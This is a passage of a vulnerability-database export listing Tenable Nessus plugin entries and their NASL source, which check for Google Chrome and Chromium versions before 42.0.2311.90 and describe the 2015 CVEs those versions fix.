"CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249", "CVE-2015-3333", "CVE-2015-3334", "CVE-2015-3335"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_42_0_2311_90.NASL", "href": "https://www.tenable.com/plugins/nessus/82825", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82825);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2015-1235\",\n \"CVE-2015-1236\",\n \"CVE-2015-1237\",\n \"CVE-2015-1238\",\n \"CVE-2015-1240\",\n \"CVE-2015-1241\",\n \"CVE-2015-1242\",\n \"CVE-2015-1244\",\n \"CVE-2015-1245\",\n \"CVE-2015-1246\",\n \"CVE-2015-1247\",\n \"CVE-2015-1248\",\n \"CVE-2015-1249\",\n \"CVE-2015-3333\",\n \"CVE-2015-3334\",\n \"CVE-2015-3335\"\n );\n script_bugtraq_id(\n 72715,\n 74165,\n 74167,\n 74221,\n 74225\n );\n\n script_name(english:\"Google Chrome < 42.0.2311.90 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 42.0.2311.90. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A cross-origin bypass vulnerability exists due to an\n unspecified flaw in the HTML parser. (CVE-2015-1235)\n\n - A cross-origin bypass vulnerability exists due to a flaw\n in MediaElementAudioSourceNode.cpp when handling audio\n content. (CVE-2015-1236)\n\n - A use-after-free error exists in render_frame_impl.cc\n due to improper handling of a frame when it receives\n messages while detaching. An attacker can exploit this\n flaw to dereference already freed memory and execute\n arbitrary code. (CVE-2015-1237)\n\n - An unspecified out-of-bounds write flaw exists in the\n Skia filters. (CVE-2015-1238)\n\n - An out-of-bounds read flaw exists in WebGL due to\n improper handling of ES3 commands. An attacker can\n exploit this flaw to disclose memory contents.\n (CVE-2015-1240)\n\n - An unspecified tap-jacking flaw exists when certain tap\n events aren't preceded by TapDown events. An attacker\n can exploit this to direct taps to cross-pages and\n cross-domains. (CVE-2015-1241)\n\n - A type confusion error exists in the\n ReduceTransitionElementsKind() function in\n hydrogen-check-elimination.cc. An attacker can exploit\n this error to execute arbitrary code. (CVE-2015-1242)\n\n - A flaw exists related to WebSocket connections due to\n HTTP Strict Transport Security (HSTS) not being strictly\n enforced. A man-in-the-middle attacker can exploit this\n flaw to view and manipulate protected communication.\n (CVE-2015-1244)\n\n - A use-after-free error exists in\n open_pdf_in_reader_view.cc due to improper handling\n handling the 'Open PDF in Reader' bubble on navigations.\n An attacker can exploit this flaw to dereference already\n freed memory and execute arbitrary code. (CVE-2015-1245)\n\n - An unspecified out-of-bounds read flaw exists in Blink.\n An attacker can exploit this to disclose memory\n contents. (CVE-2015-1246)\n\n - A flaw exists in the OnPageHasOSDD() function in\n search_engine_tab_helper.cc due to improper handling\n of URLs for the OpenSearch descriptor. An attacker can\n exploit this flaw to disclose sensitive information.\n (CVE-2015-1247)\n\n - An unspecified flaw exists that allows an attacker to\n bypass SafeBrowsing. (CVE-2015-1248)\n\n - Multiple unspecified vulnerabilities exist that allow an\n attacker to have an unspecified impact. (CVE-2015-1249)\n\n - Multiple unspecified vulnerabilities exist in V8 that\n allow an attacker to cause a denial of service and\n other unspecified impacts.\n (CVE-2015-3333)\n\n - A media permission handling weakness exists due to\n camera and microphone permissions being merged into a\n single 'Media' permission. An attacker can exploit this,\n via a specially crafted website, to turn on a victim's\n camera while the victim believes camera access is\n prohibited. (CVE-2015-3334)\n\n - A flaw exists due to missing address space usage\n limitation (RLIMIT_AS and RLIMIT_DATA) in the Native\n Client (NaCl) process. This allows a remote attacker to\n run a crafted program in the NaCl sandbox and to conduct\n row-hammer attacks. (CVE-2015-3335)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2015/04/stable-channel-update_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72311cf0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 42.0.2311.90 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3335\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'42.0.2311.90', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:45:16", "description": "The version of Google Chrome on the remote host is prior to 42.0.2311.90 and is affected by the following vulnerabilities :\n\n - A cross-origin bypass vulnerability exists due to an unspecified flaw in the HTML parser. (CVE-2015-1235)\n\n - A cross-origin bypass vulnerability exists due to a flaw in 'MediaElementAudioSourceNode.cpp' when handling audio content. (CVE-2015-1236)\n\n - A use-after-free error exists in 'render_frame_impl.cc' due to improper handling of a frame when it receives messages while detaching. An attacker can exploit this flaw to dereference already freed memory and execute arbitrary code. (CVE-2015-1237)\n\n - An unspecified out-of-bounds write flaw exists in the Skia filters. (CVE-2015-1238)\n\n - An out-of-bounds read flaw exists in WebGL due to improper handling of ES3 commands. An attacker can exploit this flaw to disclose memory contents. (CVE-2015-1240)\n\n - An unspecified tap-jacking flaw exists when certain tap events aren't preceded by TapDown events. An attacker can exploit this to direct taps to cross-pages and cross-domains. (CVE-2015-1241)\n\n - A type confusion error exists in the ReduceTransitionElementsKind() function in 'hydrogen-check-elimination.cc'. An attacker can exploit this error to execute arbitrary code. (CVE-2015-1242)\n\n - A flaw exists related to WebSocket connections due to HTTP Strict Transport Security (HSTS) not being strictly enforced. A man-in-the-middle attacker can exploit this flaw to view and manipulate protected communication. (CVE-2015-1244) - A use-after-free error exists in 'open_pdf_in_reader_view.cc' due to improper handling in the 'Open PDF in Reader' bubble on navigations. An attacker can exploit this flaw to dereference already freed memory and execute arbitrary code. (CVE-2015-1245)\n\n - An unspecified out-of-bounds read flaw exists in Blink. An attacker can exploit this to disclose memory contents. (CVE-2015-1246)\n\n - A flaw exists in the OnPageHasOSDD() function in 'search_engine_tab_helper.cc' due to improper handling of URLs for the OpenSearch descriptor. An attacker can exploit this flaw to disclose sensitive information. (CVE-2015-1247)\n\n - An unspecified flaw exists that allows an attacker to bypass SafeBrowsing. (CVE-2015-1248)\n\n - Multiple unspecified vulnerabilities exist that allow an attacker to have an unspecified impact. (CVE-2015-1249)\n\n - Multiple unspecified vulnerabilities exist in V8 that allow an attacker to cause a denial of service and other unspecified impacts. (CVE-2015-3333)\n\n - A media permission handling weakness exists due to camera and microphone permissions being merged into a single 'Media' permission. An attacker can exploit this, via a specially crafted website, to turn on a victim's camera while the victim believes camera access is prohibited. (CVE-2015-3334)\n\n - A flaw exists due to missing address space usage limitation (RLIMIT_AS and RLIMIT_DATA) in the Native Client (NaCl) process. This allows a remote attacker to run a crafted program in the NaCl sandbox and to conduct row-hammer attacks. (CVE-2015-3335)", "cvss3": {"score": null, "vector": null}, "published": "2015-06-15T00:00:00", "type": "nessus", "title": "Google Chrome < 42.0.2311.90 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249", "CVE-2015-3333", "CVE-2015-3334", "CVE-2015-3335"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "8778.PASL", "href": "https://www.tenable.com/plugins/nnm/8778", "sourceData": "Binary data 8778.pasl", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:46:03", "description": "Several vulnerabilities were discovered in the chromium web browser.\n\n - CVE-2015-1235 A Same Origin Policy bypass issue was discovered in the HTML parser.\n\n - CVE-2015-1236 Amitay Dobo discovered a Same Origin Policy bypass in the Web Audio API.\n\n - CVE-2015-1237 Khalil Zhani discovered a use-after-free issue in IPC.\n\n - CVE-2015-1238 'cloudfuzzer' discovered an out-of-bounds write in the skia library.\n\n - CVE-2015-1240 'w3bd3vil' discovered an out-of-bounds read in the WebGL implementation.\n\n - CVE-2015-1241 Phillip Moon and Matt Weston discovered a way to trigger local user interface actions remotely via a crafted website.\n\n - CVE-2015-1242 A type confusion issue was discovered in the v8 JavaScript library.\n\n - CVE-2015-1244 Mike Ruddy discovered a way to bypass the HTTP Strict Transport Security policy.\n\n - CVE-2015-1245 Khalil Zhani discovered a use-after-free issue in the pdfium library.\n\n - CVE-2015-1246 Atte Kettunen discovered an out-of-bounds read issue in webkit/blink.\n\n - CVE-2015-1247 Jann Horn discovered that 'file:' URLs in OpenSearch documents were not sanitized, which could allow local files to be read remotely when using the OpenSearch feature from a crafted website.\n\n - CVE-2015-1248 Vittorio Gambaletta discovered a way to bypass the SafeBrowsing feature, which could allow the remote execution of a downloaded executable file.\n\n - CVE-2015-1249 The chrome 41 development team found various issues from internal fuzzing, audits, and other studies.\n\n - CVE-2015-3333 Multiple issues were discovered and fixed in v8 4.2.7.14.\n\n - CVE-2015-3334 It was discovered that remote websites could capture video data from attached web cameras without permission.\n\n - CVE-2015-3336 It was discovered that remote websites could cause user interface disruptions like window fullscreening and mouse pointer locking.", "cvss3": {"score": null, "vector": null}, "published": "2015-04-29T00:00:00", "type": "nessus", "title": "Debian DSA-3238-1 : chromium-browser - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249", "CVE-2015-3333", "CVE-2015-3334", "CVE-2015-3336"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium-browser", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3238.NASL", "href": "https://www.tenable.com/plugins/nessus/83120", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3238. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83120);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1235\", \"CVE-2015-1236\", \"CVE-2015-1237\", \"CVE-2015-1238\", \"CVE-2015-1240\", \"CVE-2015-1241\", \"CVE-2015-1242\", \"CVE-2015-1244\", \"CVE-2015-1245\", \"CVE-2015-1246\", \"CVE-2015-1247\", \"CVE-2015-1248\", \"CVE-2015-1249\", \"CVE-2015-3333\", \"CVE-2015-3334\", \"CVE-2015-3336\");\n script_bugtraq_id(74165, 74167, 74221, 74225, 74227);\n script_xref(name:\"DSA\", value:\"3238\");\n\n script_name(english:\"Debian DSA-3238-1 : chromium-browser - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in the chromium web browser.\n\n - CVE-2015-1235\n A Same Origin Policy bypass issue was discovered in the\n HTML parser.\n\n - CVE-2015-1236\n Amitay Dobo discovered a Same Origin Policy bypass in\n the Web Audio API.\n\n - CVE-2015-1237\n Khalil Zhani discovered a use-after-free issue in IPC.\n\n - CVE-2015-1238\n 'cloudfuzzer' discovered an out-of-bounds write in the\n skia library.\n\n - CVE-2015-1240\n 'w3bd3vil' discovered an out-of-bounds read in the WebGL\n implementation.\n\n - CVE-2015-1241\n Phillip Moon and Matt Weston discovered a way to trigger\n local user interface actions remotely via a crafted\n website.\n\n - CVE-2015-1242\n A type confusion issue was discovered in the v8\n JavaScript library.\n\n - CVE-2015-1244\n Mike Ruddy discovered a way to bypass the HTTP Strict\n Transport Security policy.\n\n - CVE-2015-1245\n Khalil Zhani discovered a use-after-free issue in the\n pdfium library.\n\n - CVE-2015-1246\n Atte Kettunen discovered an out-of-bounds read issue in\n webkit/blink.\n\n - CVE-2015-1247\n Jann Horn discovered that 'file:' URLs in OpenSearch\n documents were not sanitized, which could allow local\n files to be read remotely when using the OpenSearch\n feature from a crafted website.\n\n - CVE-2015-1248\n Vittorio Gambaletta discovered a way to bypass the\n SafeBrowsing feature, which could allow the remote\n execution of a downloaded executable file.\n\n - CVE-2015-1249\n The chrome 41 development team found various issues from\n internal fuzzing, audits, and other studies.\n\n - CVE-2015-3333\n Multiple issues were discovered and fixed in v8\n 4.2.7.14.\n\n - CVE-2015-3334\n It was discovered that remote websites could capture\n video data from attached web cameras without permission.\n\n - CVE-2015-3336\n It was discovered that remote websites could cause user\n interface disruptions like window fullscreening and\n mouse pointer locking.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1235\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1236\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1237\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1238\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1242\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1244\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1247\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1248\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1249\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-3333\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-3334\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-3336\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/chromium-browser\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3238\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chromium-browser packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 42.0.2311.90-1~deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"chromedriver\", reference:\"42.0.2311.90-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium\", reference:\"42.0.2311.90-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-dbg\", reference:\"42.0.2311.90-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-inspector\", reference:\"42.0.2311.90-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-l10n\", reference:\"42.0.2311.90-1~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:16", "description": "The version of Google Chrome installed on the remote Mac OS X host is prior to 42.0.2311.90. It is, therefore, affected by multiple vulnerabilities :\n\n - A cross-origin bypass vulnerability exists due to an unspecified flaw in the HTML parser. (CVE-2015-1235)\n\n - A cross-origin bypass vulnerability exists due to a flaw in MediaElementAudioSourceNode.cpp when handling audio content. (CVE-2015-1236)\n\n - A use-after-free error exists in render_frame_impl.cc due to improper handling of a frame when it receives messages while detaching. An attacker can exploit this flaw to dereference already freed memory and execute arbitrary code. (CVE-2015-1237)\n\n - An unspecified out-of-bounds write flaw exists in the Skia filters. (CVE-2015-1238)\n\n - An out-of-bounds read flaw exists in WebGL due to improper handling of ES3 commands. An attacker can exploit this flaw to disclose memory contents.\n (CVE-2015-1240)\n\n - An unspecified tap-jacking flaw exists when certain tap events aren't preceded by TapDown events. An attacker can exploit this to direct taps to cross-pages and cross-domains. (CVE-2015-1241)\n\n - A type confusion error exists in the ReduceTransitionElementsKind() function in hydrogen-check-elimination.cc. An attacker can exploit this error to execute arbitrary code. (CVE-2015-1242)\n\n - A flaw exists related to WebSocket connections due to HTTP Strict Transport Security (HSTS) not being strictly enforced. A man-in-the-middle attacker can exploit this flaw to view and manipulate protected communication.\n (CVE-2015-1244)\n\n - A use-after-free error exists in open_pdf_in_reader_view.cc due to improper handling handling the 'Open PDF in Reader' bubble on navigations.\n An attacker can exploit this flaw to dereference already freed memory and execute arbitrary code. (CVE-2015-1245)\n\n - An unspecified out-of-bounds read flaw exists in Blink.\n An attacker can exploit this to disclose memory contents. (CVE-2015-1246)\n\n - A flaw exists in the OnPageHasOSDD() function in search_engine_tab_helper.cc due to improper handling of URLs for the OpenSearch descriptor. An attacker can exploit this flaw to disclose sensitive information.\n (CVE-2015-1247)\n\n - An unspecified flaw exists that allows an attacker to bypass SafeBrowsing. (CVE-2015-1248)\n\n - Multiple unspecified vulnerabilities exist that allow an attacker to have an unspecified impact. (CVE-2015-1249)\n\n - Multiple unspecified vulnerabilities exist in V8 that allow an attacker to cause a denial of service and other unspecified impacts.\n (CVE-2015-3333)\n\n - A media permission handling weakness exists due to camera and microphone permissions being merged into a single 'Media' permission. An attacker can exploit this, via a specially crafted website, to turn on a victim's camera while the victim believes camera access is prohibited. (CVE-2015-3334)\n\n - A flaw exists due to missing address space usage limitation (RLIMIT_AS and RLIMIT_DATA) in the Native Client (NaCl) process. This allows a remote attacker to run a crafted program in the NaCl sandbox and to conduct row-hammer attacks. (CVE-2015-3335) Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-04-16T00:00:00", "type": "nessus", "title": "Google Chrome < 42.0.2311.90 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249", "CVE-2015-3333", "CVE-2015-3334", "CVE-2015-3335"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_42_0_2311_90.NASL", "href": "https://www.tenable.com/plugins/nessus/82826", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82826);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-1235\",\n \"CVE-2015-1236\",\n \"CVE-2015-1237\",\n \"CVE-2015-1238\",\n \"CVE-2015-1240\",\n \"CVE-2015-1241\",\n \"CVE-2015-1242\",\n \"CVE-2015-1244\",\n \"CVE-2015-1245\",\n \"CVE-2015-1246\",\n \"CVE-2015-1247\",\n \"CVE-2015-1248\",\n \"CVE-2015-1249\",\n \"CVE-2015-3333\",\n \"CVE-2015-3334\",\n \"CVE-2015-3335\"\n );\n script_bugtraq_id(\n 72715,\n 74165,\n 74167,\n 74221,\n 74225\n );\n\n script_name(english:\"Google Chrome < 42.0.2311.90 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 42.0.2311.90. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A cross-origin bypass vulnerability exists due to an\n unspecified flaw in the HTML parser. (CVE-2015-1235)\n\n - A cross-origin bypass vulnerability exists due to a flaw\n in MediaElementAudioSourceNode.cpp when handling audio\n content. (CVE-2015-1236)\n\n - A use-after-free error exists in render_frame_impl.cc\n due to improper handling of a frame when it receives\n messages while detaching. An attacker can exploit this\n flaw to dereference already freed memory and execute\n arbitrary code. (CVE-2015-1237)\n\n - An unspecified out-of-bounds write flaw exists in the\n Skia filters. (CVE-2015-1238)\n\n - An out-of-bounds read flaw exists in WebGL due to\n improper handling of ES3 commands. An attacker can\n exploit this flaw to disclose memory contents.\n (CVE-2015-1240)\n\n - An unspecified tap-jacking flaw exists when certain tap\n events aren't preceded by TapDown events. An attacker\n can exploit this to direct taps to cross-pages and\n cross-domains. (CVE-2015-1241)\n\n - A type confusion error exists in the\n ReduceTransitionElementsKind() function in\n hydrogen-check-elimination.cc. An attacker can exploit\n this error to execute arbitrary code. (CVE-2015-1242)\n\n - A flaw exists related to WebSocket connections due to\n HTTP Strict Transport Security (HSTS) not being strictly\n enforced. A man-in-the-middle attacker can exploit this\n flaw to view and manipulate protected communication.\n (CVE-2015-1244)\n\n - A use-after-free error exists in\n open_pdf_in_reader_view.cc due to improper handling\n handling the 'Open PDF in Reader' bubble on navigations.\n An attacker can exploit this flaw to dereference already\n freed memory and execute arbitrary code. (CVE-2015-1245)\n\n - An unspecified out-of-bounds read flaw exists in Blink.\n An attacker can exploit this to disclose memory\n contents. (CVE-2015-1246)\n\n - A flaw exists in the OnPageHasOSDD() function in\n search_engine_tab_helper.cc due to improper handling\n of URLs for the OpenSearch descriptor. An attacker can\n exploit this flaw to disclose sensitive information.\n (CVE-2015-1247)\n\n - An unspecified flaw exists that allows an attacker to\n bypass SafeBrowsing. (CVE-2015-1248)\n\n - Multiple unspecified vulnerabilities exist that allow an\n attacker to have an unspecified impact. (CVE-2015-1249)\n\n - Multiple unspecified vulnerabilities exist in V8 that\n allow an attacker to cause a denial of service and\n other unspecified impacts.\n (CVE-2015-3333)\n\n - A media permission handling weakness exists due to\n camera and microphone permissions being merged into a\n single 'Media' permission. An attacker can exploit this,\n via a specially crafted website, to turn on a victim's\n camera while the victim believes camera access is\n prohibited. (CVE-2015-3334)\n\n - A flaw exists due to missing address space usage\n limitation (RLIMIT_AS and RLIMIT_DATA) in the Native\n Client (NaCl) process. This allows a remote attacker to\n run a crafted program in the NaCl sandbox and to conduct\n row-hammer attacks. (CVE-2015-3335)\n \nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2015/04/stable-channel-update_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72311cf0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 42.0.2311.90 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3335\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'42.0.2311.90', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:07", "description": "Chromium was updated to latest stable release 42.0.2311.90 to fix security issues and bugs. The following vulnerabilities were fixed :\n\n - CVE-2015-1235: Cross-origin-bypass in HTML parser.\n\n - CVE-2015-1236: Cross-origin-bypass in Blink.\n\n - CVE-2015-1237: Use-after-free in IPC.\n\n - CVE-2015-1238: Out-of-bounds write in Skia.\n\n - CVE-2015-1240: Out-of-bounds read in WebGL.\n\n - CVE-2015-1241: Tap-Jacking.\n\n - CVE-2015-1242: Type confusion in V8.\n\n - CVE-2015-1244: HSTS bypass in WebSockets.\n\n - CVE-2015-1245: Use-after-free in PDFium.\n\n - CVE-2015-1246: Out-of-bounds read in Blink.\n\n - CVE-2015-1247: Scheme issues in OpenSearch.\n\n - CVE-2015-1248: SafeBrowsing bypass.\n\n - CVE-2015-1249: Various fixes from internal audits, fuzzing and other initiatives.\n\n - CVE-2015-3333: Multiple vulnerabilities in V8 fixed at the tip of the 4.2 branch (currently 4.2.77.14).\n\n - CVE-2015-3336: fullscreen and UI locking without user confirmeation\n\n - CVE-2015-3335: unspecified impact 